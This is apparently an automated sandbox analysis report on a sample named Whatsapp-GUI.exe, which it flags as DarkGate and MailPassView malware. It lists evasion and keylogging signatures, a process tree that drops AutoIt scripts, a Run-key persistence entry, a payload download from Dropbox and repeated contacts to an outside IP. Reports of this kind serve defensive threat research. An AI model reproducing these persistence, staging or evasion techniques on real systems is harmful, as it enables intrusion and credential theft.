Edit tour

Windows Analysis Report
Whatsapp-GUI.exe

Overview

General Information

Sample name:	Whatsapp-GUI.exe
Analysis ID:	1575235
MD5:	8c3ef2eba970f543f0ebe6dced908402
SHA1:	431157eaf15244e5d8cc167511b4611f4dfae85c
SHA256:	9e4f036dd6fbb45ce414cb5d040b3255b5ccc9ecacbfaf022b631545f9a19a02
Tags:	DarkGateexeuser-smica83
Infos:

Detection

DarkGate, MailPassView

Score:	57
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Compliance

Score:	63
Range:	0 - 100

Signatures

Yara detected DarkGate

Yara detected MailPassView

AI detected suspicious sample

Contains functionality to detect sleep reduction / modifications

Contains functionality to inject code into remote processes

Contains functionality to inject threads in other processes

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Contains functionality for execution timing, often used to detect debuggers

Contains functionality for read data from the clipboard

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to record screenshots

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Enables debug privileges

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check if the current machine is a sandbox (GetTickCount - Sleep)

May sleep (evasive loops) to hinder dynamic analysis

OS version to string mapping found (often used in BOTs)

Potential key logger detected (key state polling based)

Queries information about the installed CPU (vendor, model number etc)

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries the product ID of Windows

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: CurrentVersion Autorun Keys Modification

Uses code obfuscation techniques (call, push, ret)

Yara detected Keylogger Generic

Classification

Process Tree

System is w10x64

Whatsapp-GUI.exe (PID: 1288 cmdline: "C:\Users\user\Desktop\Whatsapp-GUI.exe" MD5: 8C3EF2EBA970F543F0EBE6DCED908402)

UpdaterService.exe (PID: 2876 cmdline: "C:\ProgramData\Updater\UpdaterService.exe" "C:\ProgramData\Updater\ConfigUpdater.a3x" MD5: C56B5F0201A3B3DE53E561FE76912BFD)

cmd.exe (PID: 5796 cmdline: "c:\windows\system32\cmd.exe" /c wmic ComputerSystem get domain > C:\ProgramData\addbage\gcdkfcc MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 3116 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WMIC.exe (PID: 940 cmdline: wmic ComputerSystem get domain MD5: E2DE6500DE1148C7F6027AD50AC8B891)

Autoit3.exe (PID: 4416 cmdline: "C:\ProgramData\addbage\Autoit3.exe" C:\ProgramData\addbage\ffdghbb.a3x MD5: C56B5F0201A3B3DE53E561FE76912BFD)

Autoit3.exe (PID: 7156 cmdline: "C:\ProgramData\addbage\Autoit3.exe" C:\ProgramData\addbage\ffdghbb.a3x MD5: C56B5F0201A3B3DE53E561FE76912BFD)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
DarkGate	First documented in 2018, DarkGate is a commodity loader with features that include the ability to download and execute files to memory, a Hidden Virtual Network Computing (HVNC) module, keylogging, information-stealing capabilities, and privilege escalation. DarkGate makes use of legitimate AutoIt files and typically runs multiple AutoIt scripts. New versions of DarkGate have been advertised on a Russian language eCrime forum since May 2023.	No Attribution	https://0xtoxin.github.io/threat%20breakdown/DarkGate-Camapign-Analysis/ https://blog.sekoia.io/darkgate-internals/ https://blog.talosintelligence.com/darkgate-remote-template-injection/ https://cofense.com/blog/are-darkgate-and-pikabot-the-new-qakbot/ https://cybersecurity.att.com/blogs/security-essentials/darkgate-malware-delivered-via-microsoft-teams-detection-and-response	https://malpedia.caad.fkie.fraunhofer.de/details/win.darkgate

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000008.00000002.2391824798.0000000004758000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_DarkGate	Yara detected DarkGate	Joe Security
00000003.00000002.3941184211.0000000003EC1000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
00000009.00000002.2473661305.0000000004400000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
00000009.00000002.2473661305.0000000004400000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_DarkGate	Yara detected DarkGate	Joe Security
00000003.00000002.3940858660.0000000003D04000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
00000003.00000002.3940858660.0000000003D04000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_DarkGate	Yara detected DarkGate	Joe Security
00000003.00000002.3942078609.0000000004E10000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
00000003.00000002.3942078609.0000000004E10000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_DarkGate	Yara detected DarkGate	Joe Security
00000009.00000002.2473753332.0000000004568000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_DarkGate	Yara detected DarkGate	Joe Security
00000008.00000002.2391311533.0000000004534000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
00000008.00000002.2391311533.0000000004534000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_DarkGate	Yara detected DarkGate	Joe Security
00000008.00000002.2391730734.00000000045F0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
00000008.00000002.2391730734.00000000045F0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_DarkGate	Yara detected DarkGate	Joe Security
00000009.00000002.2473412421.0000000004344000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
00000009.00000002.2473412421.0000000004344000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_DarkGate	Yara detected DarkGate	Joe Security
00000008.00000002.2391824798.00000000046F1000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
00000003.00000002.3941184211.0000000003F28000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_DarkGate	Yara detected DarkGate	Joe Security
00000003.00000003.2230084824.0000000004A40000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
00000003.00000003.2230084824.0000000004A40000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_DarkGate	Yara detected DarkGate	Joe Security
00000009.00000002.2473753332.0000000004501000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
00000003.00000003.2230520854.0000000004AA0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_DarkGate	Yara detected DarkGate	Joe Security
00000003.00000003.2229666287.0000000004DA8000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
00000003.00000003.2229666287.0000000004DA8000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_DarkGate	Yara detected DarkGate	Joe Security
00000003.00000002.3941115350.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
00000003.00000002.3941115350.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_DarkGate	Yara detected DarkGate	Joe Security
Process Memory Space: UpdaterService.exe PID: 2876	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
Process Memory Space: UpdaterService.exe PID: 2876	JoeSecurity_DarkGate	Yara detected DarkGate	Joe Security
Process Memory Space: UpdaterService.exe PID: 2876	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
Process Memory Space: Autoit3.exe PID: 4416	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
Process Memory Space: Autoit3.exe PID: 4416	JoeSecurity_DarkGate	Yara detected DarkGate	Joe Security
Process Memory Space: Autoit3.exe PID: 7156	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
Process Memory Space: Autoit3.exe PID: 7156	JoeSecurity_DarkGate	Yara detected DarkGate	Joe Security
Click to see the 27 entries

Sigma Signatures

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\ProgramData\addbage\Autoit3.exe" C:\ProgramData\addbage\ffdghbb.a3x, EventID: 13, EventType: SetValue, Image: C:\ProgramData\Updater\UpdaterService.exe, ProcessId: 2876, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\cefccga

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 82.1% probability

Compliance

PE / OLE file has a valid certificate

Source: Whatsapp-GUI.exe

Static PE information: certificate valid

Uses secure TLS version for HTTPS connections

Source: unknown	HTTPS traffic detected: 162.125.65.18:443 -> 192.168.2.5:49710 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.125.69.15:443 -> 192.168.2.5:49712 version: TLS 1.2

Contains modern PE file flags such as dynamic base (ASLR) or NX

Source: Whatsapp-GUI.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Binary contains paths to debug symbols

Source:

Binary string: C:\Users\Work\source\repos\Whatsapp-GUI\Whatsapp-GUI\obj\Debug\Whatsapp-GUI.pdb source: Whatsapp-GUI.exe

Spreading

Source: C:\ProgramData\addbage\Autoit3.exe	Code function: 8_2_00CA4005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	8_2_00CA4005
Source: C:\ProgramData\addbage\Autoit3.exe	Code function: 8_2_00CAC2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	8_2_00CAC2FF
Source: C:\ProgramData\addbage\Autoit3.exe	Code function: 8_2_00CA494A GetFileAttributesW,FindFirstFileW,FindClose,	8_2_00CA494A
Source: C:\ProgramData\addbage\Autoit3.exe	Code function: 8_2_00CACD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	8_2_00CACD9F
Source: C:\ProgramData\addbage\Autoit3.exe	Code function: 8_2_00CACD14 FindFirstFileW,FindClose,	8_2_00CACD14
Source: C:\ProgramData\addbage\Autoit3.exe	Code function: 8_2_00CAF5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	8_2_00CAF5D8
Source: C:\ProgramData\addbage\Autoit3.exe	Code function: 8_2_00CAF735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	8_2_00CAF735
Source: C:\ProgramData\addbage\Autoit3.exe	Code function: 8_2_00CAFA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	8_2_00CAFA36
Source: C:\ProgramData\addbage\Autoit3.exe	Code function: 8_2_00CA3CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	8_2_00CA3CE2
Source: C:\ProgramData\addbage\Autoit3.exe	Code function: 8_2_0179BD35 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,	8_2_0179BD35
Source: C:\ProgramData\addbage\Autoit3.exe	Code function: 8_2_0474A584 FindFirstFileW,lstrcmpW,lstrcmpW,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FindNextFileW,FindClose,	8_2_0474A584
Source: C:\ProgramData\addbage\Autoit3.exe	Code function: 8_2_046F89F4 FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime,	8_2_046F89F4
Source: C:\ProgramData\addbage\Autoit3.exe	Code function: 8_2_046F8AFC FindFirstFileA,GetLastError,	8_2_046F8AFC
Source: C:\ProgramData\addbage\Autoit3.exe	Code function: 8_2_047431F8 FindFirstFileW,FindNextFileW,FindClose,	8_2_047431F8
Source: C:\ProgramData\addbage\Autoit3.exe	Code function: 8_2_04723D68 FindFirstFileW,FindNextFileW,FindClose,	8_2_04723D68
Source: C:\ProgramData\addbage\Autoit3.exe	Code function: 8_2_0470BD8C FindFirstFileA,FindNextFileA,FindClose,	8_2_0470BD8C
Source: C:\ProgramData\addbage\Autoit3.exe	Code function: 8_2_046F5974 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,	8_2_046F5974
Source: C:\ProgramData\addbage\Autoit3.exe	Code function: 8_2_0474BA70 FindFirstFileW,FindNextFileW,FindClose,	8_2_0474BA70

Networking

Source: global traffic	HTTP traffic detected: GET /scl/fi/puclhgu65e9r37o3vcp9m/yutighh.zip?rlkey=csgz30n1xx1twdk9ue4m4p16s&st=nll27ti7&dl=1 HTTP/1.1Host: www.dropbox.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /cd/0/get/CgQAiHznR0-yJXtQgIcAQDe00JEJnYiaT0oc5SDFG-Q_f17zZOYwtbElAtBx9tczKziQAR17ipbY3BXl7uvQEULuDJYfx524fWrqmFpUco76qNtDQVu86eEev0aoq4uaSXfphqHI8Aq1eH1z9Bj6TBgo/file?dl=1 HTTP/1.1Host: uceaa44e3ed7199ee43fadd414c8.dl.dropboxusercontent.comConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 162.125.65.18 162.125.65.18
Source: Joe Sandbox View	IP Address: 162.125.69.15 162.125.69.15

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.16.83
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.16.83
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.16.83
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.16.83
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.16.83
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.16.83
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.16.83
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.16.83
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.16.83
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.16.83
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.16.83
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.16.83
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.16.83
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.16.83
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.16.83
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.16.83
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.16.83
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.16.83
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.16.83
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.16.83
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.16.83
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.16.83
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.16.83
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.16.83
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.16.83
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.16.83
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.16.83
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.16.83
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.16.83
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.16.83
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.16.83
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.16.83
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.16.83
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.16.83
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.16.83
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.16.83
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.16.83
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.16.83
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.16.83
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.16.83
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.16.83
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.16.83
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.16.83
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.16.83
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.16.83
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.16.83
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.16.83
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.16.83
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.16.83
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.16.83

Source: C:\ProgramData\addbage\Autoit3.exe

Code function: 8_2_00CB29BA InternetReadFile,InternetQueryDataAvailable,InternetReadFile,

8_2_00CB29BA

Source: global traffic	HTTP traffic detected: GET /scl/fi/puclhgu65e9r37o3vcp9m/yutighh.zip?rlkey=csgz30n1xx1twdk9ue4m4p16s&st=nll27ti7&dl=1 HTTP/1.1Host: www.dropbox.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /cd/0/get/CgQAiHznR0-yJXtQgIcAQDe00JEJnYiaT0oc5SDFG-Q_f17zZOYwtbElAtBx9tczKziQAR17ipbY3BXl7uvQEULuDJYfx524fWrqmFpUco76qNtDQVu86eEev0aoq4uaSXfphqHI8Aq1eH1z9Bj6TBgo/file?dl=1 HTTP/1.1Host: uceaa44e3ed7199ee43fadd414c8.dl.dropboxusercontent.comConnection: Keep-Alive

Source: Whatsapp-GUI.exe, 00000000.00000002.3100193860.00000000033A6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Policy: frame-src https://* carousel: dbapi-6: dbapi-7: dbapi-8: dropbox-client: itms-apps: itms-appss: ; report-uri https://www.dropbox.com/csp_log?policy_name=metaserver-whitelist ; media-src https://* blob: ; child-src https://www.dropbox.com/static/serviceworker/ blob: ; base-uri 'self' ; connect-src https://* ws://127.0.0.1:/ws blob: wss://dsimports.dropbox.com/ ; font-src https:// data: ; default-src https://www.dropbox.com/playlist/ https://www.dropbox.com/v/s/playlist/ https://.dropboxusercontent.com/p/hls_master_playlist/ https://.dropboxusercontent.com/p/hls_playlist/ ; script-src 'unsafe-eval' 'inline-speculation-rules' https://www.dropbox.com/static/api/ https://www.dropbox.com/pithos/* https://www.dropbox.com/page_success/ https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ https://accounts.google.com/gsi/client https://canny.io/sdk.js https://www.paypal.com/sdk/js https://www.google.com/recaptcha/ https://www.gstatic.com/recaptcha/ 'unsafe-inline' ; img-src https://* data: blob: ; style-src https://* 'unsafe-inline' 'unsafe-eval' ; form-action https://docs.google.com/document/fsip/ https://docs.google.com/spreadsheets/fsip/ https://docs.google.com/presentation/fsip/ https://docs.sandbox.google.com/document/fsip/ https://docs.sandbox.google.com/spreadsheets/fsip/ https://docs.sandbox.google.com/presentation/fsip/ https://.purple.officeapps.live-int.com https://officeapps-df.live.com https://.officeapps-df.live.com https://officeapps.live.com https://.officeapps.live.com https://paper.dropbox.com/cloud-docs/edit 'self' https://www.dropbox.com/ https://dl-web.dropbox.com/ https://photos.dropbox.com/ https://paper.dropbox.com/ https://showcase.dropbox.com/ https://www.hellofax.com/ https://app.hellofax.com/ https://www.hellosign.com/ https://app.hellosign.com/ https://docsend.com/ https://www.docsend.com/ https://help.dropbox.com/ https://navi.dropbox.jp/ https://a.sprig.com/ https://selfguidedlearning.dropboxbusiness.com/ https://instructorledlearning.dropboxbusiness.com/ https://sales.dropboxbusiness.com/ https://accounts.google.com/ https://api.login.yahoo.com/ https://login.yahoo.com/ https://experience.dropbox.com/ https://pal-test.adyen.com https://2e83413d8036243b-Dropbox-pal-live.adyenpayments.com/ https://onedrive.live.com/picker ; frame-ancestors 'self' https://.dropbox.com ; object-src 'self' https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ ; worker-src https://www.dropbox.com/static/serviceworker/ https://www.dropbox.com/encrypted_folder_download/service_worker.js https://www.dropbox.com/service_worker.js blob: equals www.yahoo.com (Yahoo)
Source: Whatsapp-GUI.exe, 00000000.00000002.3100193860.0000000003375000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: api-6: dbapi-7: dbapi-8: dropbox-client: itms-apps: itms-appss: ; report-uri https://www.dropbox.com/csp_log?policy_name=metaserver-whitelist ; media-src https://* blob: ; child-src https://www.dropbox.com/static/serviceworker/ blob: ; base-uri 'self' ; connect-src https://* ws://127.0.0.1:/ws blob: wss://dsimports.dropbox.com/ ; font-src https:// data: ; default-src https://www.dropbox.com/playlist/ https://www.dropbox.com/v/s/playlist/ https://.dropboxusercontent.com/p/hls_master_playlist/ https://.dropboxusercontent.com/p/hls_playlist/ ; script-src 'unsafe-eval' 'inline-speculation-rules' https://www.dropbox.com/static/api/ https://www.dropbox.com/pithos/* https://www.dropbox.com/page_success/ https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ https://accounts.google.com/gsi/client https://canny.io/sdk.js https://www.paypal.com/sdk/js https://www.google.com/recaptcha/ https://www.gstatic.com/recaptcha/ 'unsafe-inline' ; img-src https://* data: blob: ; style-src https://* 'unsafe-inline' 'unsafe-eval' ; form-action https://docs.google.com/document/fsip/ https://docs.google.com/spreadsheets/fsip/ https://docs.google.com/presentation/fsip/ https://docs.sandbox.google.com/document/fsip/ https://docs.sandbox.google.com/spreadsheets/fsip/ https://docs.sandbox.google.com/presentation/fsip/ https://.purple.officeapps.live-int.com https://officeapps-df.live.com https://.officeapps-df.live.com https://officeapps.live.com https://.officeapps.live.com https://paper.dropbox.com/cloud-docs/edit 'self' https://www.dropbox.com/ https://dl-web.dropbox.com/ https://photos.dropbox.com/ https://paper.dropbox.com/ https://showcase.dropbox.com/ https://www.hellofax.com/ https://app.hellofax.com/ https://www.hellosign.com/ https://app.hellosign.com/ https://docsend.com/ https://www.docsend.com/ https://help.dropbox.com/ https://navi.dropbox.jp/ https://a.sprig.com/ https://selfguidedlearning.dropboxbusiness.com/ https://instructorledlearning.dropboxbusiness.com/ https://sales.dropboxbusiness.com/ https://accounts.google.com/ https://api.login.yahoo.com/ https://login.yahoo.com/ https://experience.dropbox.com/ https://pal-test.adyen.com https://2e83413d8036243b-Dropbox-pal-live.adyenpayments.com/ https://onedrive.live.com/picker ; frame-ancestors 'self' https://.dropbox.com ; object-src 'self' https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ ; worker-src https://www.dropbox.com/static/serviceworker/ https://www.dropbox.com/encrypted_folder_download/service_worker.js https://www.dropbox.com/service_worker.js blob: equals www.yahoo.com (Yahoo)
Source: Whatsapp-GUI.exe, 00000000.00000002.3100193860.00000000033AA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: frame-src https://* carousel: dbapi-6: dbapi-7: dbapi-8: dropbox-client: itms-apps: itms-appss: ; report-uri https://www.dropbox.com/csp_log?policy_name=metaserver-whitelist ; media-src https://* blob: ; child-src https://www.dropbox.com/static/serviceworker/ blob: ; base-uri 'self' ; connect-src https://* ws://127.0.0.1:/ws blob: wss://dsimports.dropbox.com/ ; font-src https:// data: ; default-src https://www.dropbox.com/playlist/ https://www.dropbox.com/v/s/playlist/ https://.dropboxusercontent.com/p/hls_master_playlist/ https://.dropboxusercontent.com/p/hls_playlist/ ; script-src 'unsafe-eval' 'inline-speculation-rules' https://www.dropbox.com/static/api/ https://www.dropbox.com/pithos/* https://www.dropbox.com/page_success/ https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ https://accounts.google.com/gsi/client https://canny.io/sdk.js https://www.paypal.com/sdk/js https://www.google.com/recaptcha/ https://www.gstatic.com/recaptcha/ 'unsafe-inline' ; img-src https://* data: blob: ; style-src https://* 'unsafe-inline' 'unsafe-eval' ; form-action https://docs.google.com/document/fsip/ https://docs.google.com/spreadsheets/fsip/ https://docs.google.com/presentation/fsip/ https://docs.sandbox.google.com/document/fsip/ https://docs.sandbox.google.com/spreadsheets/fsip/ https://docs.sandbox.google.com/presentation/fsip/ https://.purple.officeapps.live-int.com https://officeapps-df.live.com https://.officeapps-df.live.com https://officeapps.live.com https://.officeapps.live.com https://paper.dropbox.com/cloud-docs/edit 'self' https://www.dropbox.com/ https://dl-web.dropbox.com/ https://photos.dropbox.com/ https://paper.dropbox.com/ https://showcase.dropbox.com/ https://www.hellofax.com/ https://app.hellofax.com/ https://www.hellosign.com/ https://app.hellosign.com/ https://docsend.com/ https://www.docsend.com/ https://help.dropbox.com/ https://navi.dropbox.jp/ https://a.sprig.com/ https://selfguidedlearning.dropboxbusiness.com/ https://instructorledlearning.dropboxbusiness.com/ https://sales.dropboxbusiness.com/ https://accounts.google.com/ https://api.login.yahoo.com/ https://login.yahoo.com/ https://experience.dropbox.com/ https://pal-test.adyen.com https://2e83413d8036243b-Dropbox-pal-live.adyenpayments.com/ https://onedrive.live.com/picker ; frame-ancestors 'self' https://.dropbox.com ; object-src 'self' https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ ; worker-src https://www.dropbox.com/static/serviceworker/ https://www.dropbox.com/encrypted_folder_download/service_worker.js https://www.dropbox.com/service_worker.js blob: equals www.yahoo.com (Yahoo)

Source: global traffic	DNS traffic detected: DNS query: www.dropbox.com
Source: global traffic	DNS traffic detected: DNS query: uceaa44e3ed7199ee43fadd414c8.dl.dropboxusercontent.com

Source: Whatsapp-GUI.exe	String found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
Source: Whatsapp-GUI.exe	String found in binary or memory: http://crl.globalsign.com/codesigningrootr45.crl0U
Source: Whatsapp-GUI.exe, 00000000.00000002.3100193860.000000000344C000.00000004.00000800.00020000.00000000.sdmp, UpdaterService.exe, 00000003.00000003.2227403082.00000000047B3000.00000004.00001000.00020000.00000000.sdmp, UpdaterService.exe, 00000003.00000003.2230168514.00000000046D6000.00000004.00001000.00020000.00000000.sdmp, UpdaterService.exe, 00000003.00000003.2227976170.00000000047B1000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe.0.dr, Autoit3.exe.3.dr	String found in binary or memory: http://crl.globalsign.com/gs/gstimestampingsha2g2.crl0
Source: Whatsapp-GUI.exe, 00000000.00000002.3100193860.000000000344C000.00000004.00000800.00020000.00000000.sdmp, UpdaterService.exe, 00000003.00000003.2227403082.00000000047B3000.00000004.00001000.00020000.00000000.sdmp, UpdaterService.exe, 00000003.00000003.2230168514.00000000046D6000.00000004.00001000.00020000.00000000.sdmp, UpdaterService.exe, 00000003.00000003.2227976170.00000000047B1000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe.0.dr, Autoit3.exe.3.dr	String found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
Source: Whatsapp-GUI.exe	String found in binary or memory: http://crl.globalsign.com/gsgccr45evcodesignca2020.crl0&
